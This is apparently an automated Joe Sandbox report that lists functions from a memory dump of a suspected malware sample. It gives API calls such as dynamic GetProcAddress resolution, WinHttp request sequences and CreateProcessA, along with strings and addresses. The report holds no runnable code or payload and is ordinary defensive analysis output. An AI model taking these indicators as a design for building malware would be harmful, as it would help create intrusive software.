Function 001EFBD0, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 204library

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 001EFC4F
GetProcAddress.KERNEL32(00000000,?), ref: 001EFC72
GetProcAddress.KERNEL32(00000000,?), ref: 001EFC95
GetProcAddress.KERNEL32(00000000,?), ref: 001EFCB8

Strings

p9?, xrefs: 001EFC0E, 001EFCC7, 001EFCEC, 001EFD13, 001EFD9B, 001EFDBB, 001EFDDE, 001EFDFB, 001EFE16
SeTcbPrivilege, xrefs: 001EFCFC

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E71D1, Relevance: 7.5, APIs: 5, Instructions: 49timethread

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001E7208
GetCurrentProcessId.KERNEL32 ref: 001E7214
GetCurrentThreadId.KERNEL32 ref: 001E721C
GetTickCount.KERNEL32 ref: 001E7224
QueryPerformanceCounter.KERNEL32(?), ref: 001E7230

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E2C63, Relevance: 6.0, APIs: 4, Instructions: 48

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001EDD4D
UnhandledExceptionFilter.KERNEL32(001F6DB8), ref: 001EDD58
GetCurrentProcess.KERNEL32(C0000409), ref: 001EDD63
TerminateProcess.KERNEL32(00000000), ref: 001EDD6A

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E2530, Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 159

APIs

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

Part of subcall function 001F0E20: _vsnwprintf.MSVCRT ref: 001F0E52

GetLastError.KERNEL32 ref: 001E26BD

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Strings

*.*, xrefs: 001E259F
p9?, xrefs: 001E253C, 001E2567, 001E25C4, 001E26A3, 001E26D2

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E76E0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 128

APIs

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

memcpy.MSVCRT ref: 001E77B9

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Strings

p9?, xrefs: 001E76E6, 001E7741, 001E7768, 001E778B, 001E77C1, 001E77FD, 001E7816
, xrefs: 001E772E

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E4A60, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 155library

APIs

GetProcAddress.KERNEL32(00000000), ref: 001E4AC4

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

Part of subcall function 001F0E20: _vsnwprintf.MSVCRT ref: 001F0E52

Strings

p9?, xrefs: 001E4A69, 001E4AA7, 001E4ACE

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001F21B0, Relevance: 2.8, APIs: 2, Instructions: 274

APIs

memset.MSVCRT ref: 001F22E8
memset.MSVCRT ref: 001F23F9

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001F0E90, Relevance: 2.6, Strings: 2, Instructions: 115

Strings

p9?, xrefs: 001F0ED4, 001F0F03
%02X, xrefs: 001F0F6B

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EF9A0, Relevance: 1.4, Strings: 1, Instructions: 115

Strings

p9?, xrefs: 001EF9A6, 001EF9E8, 001EFA0C, 001EFA28, 001EFA5E, 001EFA8D, 001EFAA3

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EF590, Relevance: 1.3, Strings: 1, Instructions: 80

Strings

p9?, xrefs: 001EF5B5, 001EF5E6

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EBB60, Relevance: 1.3, Strings: 1, Instructions: 72

Strings

p9?, xrefs: 001EBB81, 001EBBB9

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E7850, Relevance: 1.3, Strings: 1, Instructions: 67

Strings

p9?, xrefs: 001E7859, 001E7885, 001E78A3, 001E78B9, 001E7902

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E67C0, Relevance: 1.3, Strings: 1, Instructions: 66

Strings

p9?, xrefs: 001E67DA

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EF7D0, Relevance: 1.3, Strings: 1, Instructions: 57

Strings

p9?, xrefs: 001EF7DA, 001EF7F6, 001EF808

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E4380, Relevance: 1.3, Strings: 1, Instructions: 34

Strings

p9?, xrefs: 001E4389

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001F2F40, Relevance: .0, Instructions: 11

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E7270, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 250time

APIs

memset.MSVCRT ref: 001E7292
WinHttpCrackUrl.WINHTTP(?,00000000,00000000,?,?,?,001F04FF), ref: 001E72B7

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,?,?,?,001F04FB,?,?,?,?,001F04FF), ref: 001E734E
WinHttpSetTimeouts.WINHTTP(00000000,00015F90,00015F90,0002BF20,001ED31E,?,001F04FB,?,?,?,?,001F04FF), ref: 001E737B
WinHttpConnect.WINHTTP(00000000,001ED31E,00000000,00000000,?,001F04FB,?,?,?,?,001F04FF), ref: 001E738A
WinHttpOpenRequest.WINHTTP(00000000,?,?,00000000,00000000,00000000,00800000,?,?,?,?,?,001F04FB), ref: 001E73EB
WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,001F04FB), ref: 001E7408
WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,?,?,001F04FB,?,?,?,?,001F04FF), ref: 001E7419
WinHttpQueryHeaders.WINHTTP(00000000,20000013,00000000,?,0000000C,00000000,?,?,?,?,?,001F04FB,?,?,?,?), ref: 001E7440
WinHttpQueryDataAvailable.WINHTTP(00000000,00000004,?,?,?,?,?,001F04FB,?,?,?,?,001F04FF), ref: 001E746C
WinHttpReadData.WINHTTP(00000000,00000000,00000000,?,?,?,?,?,?,?,?,001F04FB,?,?,?,?), ref: 001E74AD
WinHttpCloseHandle.WINHTTP(00000000,?,?,?,?,?,001F04FB,?,?,?,?,001F04FF), ref: 001E74D7
WinHttpCloseHandle.WINHTTP(00000000,?,?,?,?,?,001F04FB,?,?,?,?,001F04FF), ref: 001E74E1
WinHttpCloseHandle.WINHTTP(?,?,001F04FB,?,?,?,?,001F04FF), ref: 001E74EB

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Strings

<, xrefs: 001E72A7
q*\n)W\n, xrefs: 001E74D7, 001E74E1, 001E74EB

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EE230, Relevance: 21.4, APIs: 9, Strings: 3, Instructions: 434library

APIs

memset.MSVCRT ref: 001EE25C
GetProcAddress.KERNEL32(001ECB21,?), ref: 001EE3F1
GetProcAddress.KERNEL32(001ECB21,?), ref: 001EE419
GetProcAddress.KERNEL32(001ECB21,?), ref: 001EE441
GetProcAddress.KERNEL32(001ECB21,?), ref: 001EE469
GetProcAddress.KERNEL32(001ECB21,?), ref: 001EE491
GetProcAddress.KERNEL32(001ECB21,?), ref: 001EE4B9
GetProcAddress.KERNEL32(001ECB21,?), ref: 001EE4E1
GetProcAddress.KERNEL32(001ECB21,?), ref: 001EE509

Strings

P, xrefs: 001EE5A8
p9?, xrefs: 001EE261, 001EE27E, 001EE296, 001EE2BD, 001EE2F4, 001EE32C, 001EE3BA, 001EE5B8, 001EE5DB, 001EE5F0, 001EE602, 001EE658, 001EE66D, 001EE682, 001EE69A, 001EE6CE, 001EE702, 001EE731, 001EE75F
Xh, xrefs: 001EE5A2

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E8820, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 115time

APIs

WinHttpCloseHandle.WINHTTP(?,00000000,00000000), ref: 001E884E
WinHttpSetTimeouts.WINHTTP(?,00015F90,00015F90,0002BF20,000927C0,00000000,00000000), ref: 001E886F
WinHttpOpenRequest.WINHTTP(?,?,00000004,00000000,00000000,00000000,?), ref: 001E88A6
WinHttpSetOption.WINHTTP(00000000,0000001F,00000004,00000004), ref: 001E88C8
WinHttpSendRequest.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001E88DC
WinHttpCloseHandle.WINHTTP(?,00000000,00000000), ref: 001E8900
WinHttpReceiveResponse.WINHTTP(?,00000000), ref: 001E891D
WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,?,00000004,00000000), ref: 001E893A

Strings

q*\n)W\n, xrefs: 001E884E, 001E8900
p9?, xrefs: 001E88E6

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EDB20, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117time

APIs

WinHttpCloseHandle.WINHTTP(?,00000000,00000000), ref: 001EDB4E
WinHttpSetTimeouts.WINHTTP(?,00015F90,00015F90,002932E0,0002BF20,00000000,00000000), ref: 001EDB6F
WinHttpOpenRequest.WINHTTP(?,?,00000004,00000000,00000000,00000000,?), ref: 001EDBA6
WinHttpSetOption.WINHTTP(00000000,0000001F,00000004,00000004), ref: 001EDBCC
WinHttpSendRequest.WINHTTP(?,?,?,?,?,?,00000000), ref: 001EDBEF
WinHttpReceiveResponse.WINHTTP(?,00000000), ref: 001EDBFE
WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,?,00000004,00000000), ref: 001EDC1B
WinHttpCloseHandle.WINHTTP(?,00000000,00000000), ref: 001EDC42

Strings

q*\n)W\n, xrefs: 001EDB4E, 001EDC42

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EDF60, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 204

APIs

Part of subcall function 001E3350: ??3@YAXPAX@Z.MSVCRT ref: 001E3371

SysFreeString.OLEAUT32(?), ref: 001EE008
SysFreeString.OLEAUT32(?), ref: 001EE015
SysFreeString.OLEAUT32(?), ref: 001EE022

Part of subcall function 001EB300: SysFreeString.OLEAUT32(?), ref: 001EB318
Part of subcall function 001EB300: SysFreeString.OLEAUT32(?), ref: 001EB321

??2@YAPAXI@Z.MSVCRT ref: 001EE0F5

Part of subcall function 001F0C60: ??2@YAPAXI@Z.MSVCRT ref: 001F0C8F

Part of subcall function 001E2200: SysAllocString.OLEAUT32(?), ref: 001E2211
Part of subcall function 001E2200: SysAllocString.OLEAUT32(?), ref: 001E2219

SysFreeString.OLEAUT32(?), ref: 001EE149
SysFreeString.OLEAUT32(?), ref: 001EE153
SysFreeString.OLEAUT32(?), ref: 001EE15D

Strings

p9?, xrefs: 001EE072

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EAB80, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 195

APIs

SysFreeString.OLEAUT32(?), ref: 001EAD77

Part of subcall function 001F2DB0: tolower.MSVCRT ref: 001F2DEB

SysFreeString.OLEAUT32(?), ref: 001EAC38
SysFreeString.OLEAUT32(?), ref: 001EAC49
SysAllocString.OLEAUT32(?), ref: 001EACD4

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

_wtoi.MSVCRT ref: 001EACA4

Part of subcall function 001EDF60: SysFreeString.OLEAUT32(?), ref: 001EE008
Part of subcall function 001EDF60: SysFreeString.OLEAUT32(?), ref: 001EE015
Part of subcall function 001EDF60: SysFreeString.OLEAUT32(?), ref: 001EE022
Part of subcall function 001EDF60: ??2@YAPAXI@Z.MSVCRT ref: 001EE0F5
Part of subcall function 001EDF60: SysFreeString.OLEAUT32(?), ref: 001EE149
Part of subcall function 001EDF60: SysFreeString.OLEAUT32(?), ref: 001EE153
Part of subcall function 001EDF60: SysFreeString.OLEAUT32(?), ref: 001EE15D

Part of subcall function 001E3F10: SysFreeString.OLEAUT32(?), ref: 001E4028
Part of subcall function 001E3F10: SysFreeString.OLEAUT32(?), ref: 001E403D
Part of subcall function 001E3F10: _wtoi.MSVCRT ref: 001E40EE
Part of subcall function 001E3F10: rand.MSVCRT ref: 001E4160
Part of subcall function 001E3F10: SysFreeString.OLEAUT32(?), ref: 001E430F
Part of subcall function 001E3F10: SysFreeString.OLEAUT32(?), ref: 001E431D

SysFreeString.OLEAUT32(?), ref: 001EAD69

Strings

run, xrefs: 001EAD0F
mcco, xrefs: 001EAC86

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E3F10, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 384

APIs

SysFreeString.OLEAUT32(?), ref: 001E4028
SysFreeString.OLEAUT32(?), ref: 001E403D
_wtoi.MSVCRT ref: 001E40EE
rand.MSVCRT ref: 001E4160

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

SysFreeString.OLEAUT32(?), ref: 001E430F
SysFreeString.OLEAUT32(?), ref: 001E431D

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

Strings

p9?, xrefs: 001E408D

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EC060, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 336

APIs

SysFreeString.OLEAUT32(?), ref: 001EC149
SysFreeString.OLEAUT32(?), ref: 001EC15E
_wtoi.MSVCRT ref: 001EC215
rand.MSVCRT ref: 001EC260

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

SysFreeString.OLEAUT32(?), ref: 001EC3AE
SysFreeString.OLEAUT32(?), ref: 001EC3BC

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

Strings

p9?, xrefs: 001EC1AE

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001F2BC0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175

APIs

??2@YAPAXI@Z.MSVCRT ref: 001F2C56
??2@YAPAXI@Z.MSVCRT ref: 001F2C90
??2@YAPAXI@Z.MSVCRT ref: 001F2CDB
??3@YAXPAX@Z.MSVCRT ref: 001F2D75
??3@YAXPAX@Z.MSVCRT ref: 001F2D8A

Part of subcall function 001ECCF0: SysFreeString.OLEAUT32(?), ref: 001ECD01

??3@YAXPAX@Z.MSVCRT ref: 001F2D9E

Part of subcall function 001E1F50: memcpy.MSVCRT ref: 001E1FEC

Strings

p9?, xrefs: 001F2BE3, 001F2C14

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001F2650, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 52process

APIs

memset.MSVCRT ref: 001F265F
CreateProcessA.KERNEL32(00000000,001F2798,00000000,00000000,00000000,00000010,00000000,00000000,?,?), ref: 001F2698
WaitForSingleObject.KERNEL32(?,00002710), ref: 001F26AE
CloseHandle.KERNEL32(?), ref: 001F26BE
CloseHandle.KERNEL32(?), ref: 001F26C4

Strings

D, xrefs: 001F268A
qega, xrefs: 001F2656

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

